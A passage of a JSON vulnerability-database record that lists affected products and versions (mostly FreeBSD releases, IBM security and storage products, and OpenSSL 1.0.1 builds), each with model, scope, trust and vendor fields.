"ibm", "version": "4.5" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "8-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p6", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "8.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2-" }, { "model": "9.1-release-p18", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "junos os 14.1r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4x" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0.x" }, { "model": "junos os 13.3r3-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "7.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0" }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "6.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "7.0-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "8.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "6.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5x" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "-release-p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p32", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "7.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "10.0-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "8.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1x" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "7.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0.x" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release -p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2-" }, { "model": "8.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2x" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.0" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "8-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.2-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-release-p38", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "6.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.4" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1x" }, { "model": "9.3-release-p1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "8.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.5" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7.1" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "beta4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "7.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.5" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "7.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3--" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "5.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p10", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "-release-p17", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "7.0-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { 